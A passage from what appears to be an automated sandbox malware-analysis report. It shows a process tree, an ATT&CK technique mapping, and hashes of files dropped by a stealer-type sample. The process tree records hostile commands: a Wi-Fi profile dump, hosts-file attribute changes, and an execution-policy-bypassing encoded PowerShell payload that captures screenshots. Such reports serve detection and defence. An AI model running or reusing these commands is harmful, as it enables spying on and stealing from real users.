                                                                                                                            PID:2012
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            wmic csproduct get UUID
                                                                                                                            7⤵
                                                                                                                              PID:5076
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                              7⤵
                                                                                                                              • Drops file in Drivers directory
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:400
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                              7⤵
                                                                                                                              • Drops file in Drivers directory
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:3792
                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                              netsh wlan show profiles
                                                                                                                              7⤵
                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                              PID:4464
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:3692
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.cmdline"
                                                                                                                                8⤵
                                                                                                                                  PID:3792
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES818F.tmp" "c:\Users\Admin\AppData\Local\Temp\cfazm51b\CSC8BC65533630D41A3BCD380E4B7AD38A9.TMP"
                                                                                                                                    9⤵
                                                                                                                                      PID:5076
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                      1⤵
                                                                                                                        PID:3760
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                        1⤵
                                                                                                                          PID:4968
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                          1⤵
                                                                                                                            PID:1168
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                            1⤵
                                                                                                                              PID:2552
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                              1⤵
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:3540
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                              1⤵
                                                                                                                                PID:2192
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                1⤵
                                                                                                                                  PID:2556
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                  1⤵
                                                                                                                                    PID:552
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                    1⤵
                                                                                                                                      PID:2816
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3608,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:8
                                                                                                                                      1⤵
                                                                                                                                        PID:4748
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:2076

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Reconnaissance

                                                                                                                                        Resource Development

                                                                                                                                        Initial Access

                                                                                                                                        Execution

                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                        1
                                                                                                                                        T1059

                                                                                                                                        PowerShell

                                                                                                                                        1
                                                                                                                                        T1059.001

                                                                                                                                        Persistence

                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                        1
                                                                                                                                        T1547

                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                        1
                                                                                                                                        T1547.001

                                                                                                                                        Event Triggered Execution

                                                                                                                                        1
                                                                                                                                        T1546

                                                                                                                                        Netsh Helper DLL

                                                                                                                                        1
                                                                                                                                        T1546.007

                                                                                                                                        Privilege Escalation

                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                        1
                                                                                                                                        T1547

                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                        1
                                                                                                                                        T1547.001

                                                                                                                                        Event Triggered Execution

                                                                                                                                        1
                                                                                                                                        T1546

                                                                                                                                        Netsh Helper DLL

                                                                                                                                        1
                                                                                                                                        T1546.007

                                                                                                                                        Defense Evasion

                                                                                                                                        Hide Artifacts

                                                                                                                                        1
                                                                                                                                        T1564

                                                                                                                                        Hidden Files and Directories

                                                                                                                                        1
                                                                                                                                        T1564.001

                                                                                                                                        Modify Registry

                                                                                                                                        2
                                                                                                                                        T1112

                                                                                                                                        Credential Access

                                                                                                                                        Unsecured Credentials

                                                                                                                                        1
                                                                                                                                        T1552

                                                                                                                                        Credentials In Files

                                                                                                                                        1
                                                                                                                                        T1552.001

                                                                                                                                        Discovery

                                                                                                                                        Query Registry

                                                                                                                                        1
                                                                                                                                        T1012

                                                                                                                                        System Information Discovery

                                                                                                                                        3
                                                                                                                                        T1082

                                                                                                                                        Lateral Movement

                                                                                                                                        Collection

                                                                                                                                        Data from Local System

                                                                                                                                        1
                                                                                                                                        T1005

                                                                                                                                        Command and Control

                                                                                                                                        Web Service

                                                                                                                                        1
                                                                                                                                        T1102

                                                                                                                                        Exfiltration

                                                                                                                                        Impact

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                          Filesize

                                                                                                                                          328B

                                                                                                                                          MD5

                                                                                                                                          679ad75389f878484fb4041d03fbb26e

                                                                                                                                          SHA1

                                                                                                                                          b195403a9fd49c68f829a3eb1f5c7d934b76e8ad

                                                                                                                                          SHA256

                                                                                                                                          55d7e24790ec57712cb868dc0f56af5720cd97bb2fb7219fcbd9c3dfe596823e

                                                                                                                                          SHA512

                                                                                                                                          3d0bc8e8be16d494a64b49a599744e8e78704c33c3d56f3a997dbab2766c21f6f8d8ed2adf73360588967b41b429aca42c556e25cbb7c59759030edee318dc02

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                          Filesize

                                                                                                                                          3KB

                                                                                                                                          MD5

                                                                                                                                          661739d384d9dfd807a089721202900b

                                                                                                                                          SHA1

                                                                                                                                          5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                                          SHA256

                                                                                                                                          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                                          SHA512

                                                                                                                                          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                          Filesize

                                                                                                                                          53KB

                                                                                                                                          MD5

                                                                                                                                          a26df49623eff12a70a93f649776dab7

                                                                                                                                          SHA1

                                                                                                                                          efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                                          SHA256

                                                                                                                                          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                                          SHA512

                                                                                                                                          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          e3acf7533677fd62b80273a1912a1069

                                                                                                                                          SHA1

                                                                                                                                          dc37d36778f783e5b6bb3ca022c8ae9ae1509269

                                                                                                                                          SHA256

                                                                                                                                          f894f1ecc9b9bcd699643d261a23161ed2474ca6bb4af7f89ae2b24119f73050

                                                                                                                                          SHA512

                                                                                                                                          86ad56420f4d263e9276070bbabd4510ecb51d76a6f4094fca7fd6761368a1842c778f560570f3a3a0bfd4c4636c16b010c1407328320b14a0fcce974adb1adc

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                                          SHA1

                                                                                                                                          0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                                          SHA256

                                                                                                                                          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                                          SHA512

                                                                                                                                          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          12c844ed8342738dacc6eb0072c43257

                                                                                                                                          SHA1

                                                                                                                                          b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

                                                                                                                                          SHA256

                                                                                                                                          2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

                                                                                                                                          SHA512

                                                                                                                                          e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Filesize

                                                                                                                                          944B

                                                                                                                                          MD5

                                                                                                                                          77d622bb1a5b250869a3238b9bc1402b

                                                                                                                                          SHA1

                                                                                                                                          d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                                          SHA256

                                                                                                                                          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                                          SHA512

                                                                                                                                          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Filesize

                                                                                                                                          944B

                                                                                                                                          MD5

                                                                                                                                          15dde0683cd1ca19785d7262f554ba93

                                                                                                                                          SHA1

                                                                                                                                          d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                                          SHA256

                                                                                                                                          d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                                          SHA512

                                                                                                                                          57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          9d9e705ca093c4764faefe905fe84345

                                                                                                                                          SHA1

                                                                                                                                          c5e62bb784f8a9e8d25809dc80cc1302f38988d5

                                                                                                                                          SHA256

                                                                                                                                          e613602ca5bb32b5c80fd0108e4bda25a38dba0edd72fdc1b20ac02ab8b697a8

                                                                                                                                          SHA512

                                                                                                                                          a31bae5e43a9a666cdd817d6494ca64915abc6f887a9e00b01d5ce413768f3baee9053810e27d94172fa4c803f366f9fce62a06a2d4cd070708481e2338e8311

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D3yNiqEK91\Display (1).png
                                                                                                                                          Filesize

                                                                                                                                          193KB

                                                                                                                                          MD5

                                                                                                                                          df380fe757cf1d60110ec925c5e573f2

                                                                                                                                          SHA1

                                                                                                                                          3c9b62065ccbee8336c82e176e6a7fc39eac8b87

                                                                                                                                          SHA256

                                                                                                                                          22982a85edcd122586edcd000373a51e893ce5d32527fb0f1e54ac13b99f0240

                                                                                                                                          SHA512

                                                                                                                                          4b27ee1892143367fdbb17a3eda8ed64a8d9f06cfa5d31a1b40c5c279f982c60d2fbe4121c730573f93dc6a2d337456b36dfe46b2a0a86e64e2a30dce3cc3942

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RES818F.tmp
                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          4a61e48794d09a2db8b2f0de09434cc5

                                                                                                                                          SHA1

                                                                                                                                          4ec7704ee98cf54f3027c147543fe9bf1dade780

                                                                                                                                          SHA256

                                                                                                                                          69798f8dcb03648e7209a010aaa55b9e90773c45b6fd82cd6f029f2ec8d5a9cf

                                                                                                                                          SHA512

                                                                                                                                          da60d8d5b1d75f7df11fb5ce69af5a40a0d8f0502f189505a237f1603149e424b35fc1e355d5e33184a2dd30e08d618daece498d139f38f19158ef0cb7caa901

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dddw2fey.4sf.ps1
                                                                                                                                          Filesize

                                                                                                                                          60B

                                                                                                                                          MD5

                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                          SHA1

                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                          SHA256

                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                          SHA512

                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.dll
                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                          MD5

                                                                                                                                          1c4b04aec5d48b010251e077f1fdbf68

                                                                                                                                          SHA1

                                                                                                                                          fcaead9eb9dca67eb6f02c810d33b1c4d78a42fe

                                                                                                                                          SHA256

                                                                                                                                          ed8784275f386227da24f3c8f3ed30f0f9a155b883b246476d126b527987f2ef

                                                                                                                                          SHA512

                                                                                                                                          383bdaaa0ed756bf5716da2f4f37ef274bb8f139dbcb551cc01af35240741add5f06efeba8b2636b4575044b85c8cee70882c63482be0f2eb031bba658701887

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\skuld.bat
                                                                                                                                          Filesize

                                                                                                                                          12.8MB

                                                                                                                                          MD5

                                                                                                                                          1f55ef1e5c6dcae77ee50d8233e1129d

                                                                                                                                          SHA1

                                                                                                                                          dbafaf20471dd8191fd31e2ea8c1b65205efeeab

                                                                                                                                          SHA256

                                                                                                                                          d4ddc23d57ac6c7c52eb057c9c3adc0db5567c662974a5cc7ef9ad3bb2c91f47

                                                                                                                                          SHA512

                                                                                                                                          d05ce7bc83e55d8f2cdcdb5e7559d1bfe0b62ab7b23bc0591960cc0f3a990988d6b05c1b94aa4c84d070c7dbfcd3aa149b59303c19454e096249699eacd3705d

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xworm.bat
                                                                                                                                          Filesize

                                                                                                                                          155KB

                                                                                                                                          MD5

                                                                                                                                          45f7e10fb33d48463a55c89d40d4824a

                                                                                                                                          SHA1

                                                                                                                                          b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2

                                                                                                                                          SHA256

                                                                                                                                          7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f

                                                                                                                                          SHA512

                                                                                                                                          43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat
                                                                                                                                          Filesize

                                                                                                                                          26.0MB

                                                                                                                                          MD5

                                                                                                                                          b6043c62279ba9658cb83d9a25e5a23b

                                                                                                                                          SHA1

                                                                                                                                          f707fc5bb01d16e151fe115dccc730819a81da88

                                                                                                                                          SHA256

                                                                                                                                          edd80a73c65730613d5eda3a78a5a79d7acf9c93b054882ff0f57f0cddfae36c

                                                                                                                                          SHA512

                                                                                                                                          273c82e5f1a80d810874fcea5e03527bf0fe39663a875444ae15194a535b5ba37340193074abcb7534a17d0a99e52b77029a7a659505f488ec8717db54db7d69

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs
                                                                                                                                          Filesize

                                                                                                                                          124B

                                                                                                                                          MD5

                                                                                                                                          d47fb9c6ab8b21c52917923b2144eff2

                                                                                                                                          SHA1

                                                                                                                                          ab7ee7345e6d4b96f2682abab1840e409e7b4546

                                                                                                                                          SHA256

                                                                                                                                          ee667a9e2a8c9390f0e2039bcb9d2c274f7bcfda671e652063038280d1ef71c8

                                                                                                                                          SHA512

                                                                                                                                          6c3495eac2ad9b3180dcc519a50e08edfb130966e421fb61ee534a75c6465ec3d5189910fda57246a7e1258c6de8ce45e2493df3dcdacb3fdfa55e1358a5876c

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                          Filesize

                                                                                                                                          442KB

                                                                                                                                          MD5

                                                                                                                                          04029e121a0cfa5991749937dd22a1d9

                                                                                                                                          SHA1

                                                                                                                                          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                          SHA256

                                                                                                                                          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                          SHA512

                                                                                                                                          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs
                                                                                                                                          Filesize

                                                                                                                                          115B

                                                                                                                                          MD5

                                                                                                                                          218455e7578c864e6be4c255941661a6

                                                                                                                                          SHA1

                                                                                                                                          cb4be5787053e6f3eefaa3a4c02ab05854f5770e

                                                                                                                                          SHA256

                                                                                                                                          e5953ed297587047109871a8d2a2149ef8d25300557a98f8461792c20ffe5955

                                                                                                                                          SHA512

                                                                                                                                          2f78833b831fc05f3d5f7c3e952980abb2462194627bf5ad3eedf14a7f0a6a359b56b80c9e10a7acdf70f2fa704768d0a2cee277adc4d08cf40c38ae71d9f106

                                                                                                                                          Download Submit

                                                                                                                                        • C:\Windows\System32\drivers\etc\hosts
                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          6e2386469072b80f18d5722d07afdc0b

                                                                                                                                          SHA1

                                                                                                                                          032d13e364833d7276fcab8a5b2759e79182880f

                                                                                                                                          SHA256

                                                                                                                                          ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                                                                                          SHA512

                                                                                                                                          e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                                                                                                          Download Submit

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\CSC8BC65533630D41A3BCD380E4B7AD38A9.TMP
                                                                                                                                          Filesize

                                                                                                                                          652B

                                                                                                                                          MD5

                                                                                                                                          a46f5bef18756cf1bcb2d093ea0105a1

                                                                                                                                          SHA1

                                                                                                                                          7624e6dbe7565882b7b143652e5e24e4f9aa53bd

                                                                                                                                          SHA256

                                                                                                                                          7542195bda4ece803403f340cb81a77e13e33ff6ff61af18ca54be28a714cd2b

                                                                                                                                          SHA512

                                                                                                                                          bbdfcdfdddaf937e8618db6c67328a29031d2c97d21f2a4117d5fa453c799630600c19e956f2015aec4bc97544d5d165cb0fc5039547bdf9c5e7285122321dba

                                                                                                                                          Download Submit

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.0.cs
                                                                                                                                          Filesize

                                                                                                                                          1004B

                                                                                                                                          MD5

                                                                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                                                                          SHA1

                                                                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                                          SHA256

                                                                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                                          SHA512

                                                                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                                          Download Submit

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.cmdline
                                                                                                                                          Filesize

                                                                                                                                          607B

                                                                                                                                          MD5

                                                                                                                                          de44462ae3ad140205accd11df687b59

                                                                                                                                          SHA1

                                                                                                                                          4eba67a423e7f9a1fe7924f9dd8562cb4f8dc7d2

                                                                                                                                          SHA256

                                                                                                                                          730233348624bf79aecfeba8d29bacc5d77b95d25e73fe2122403d834da47c2d

                                                                                                                                          SHA512

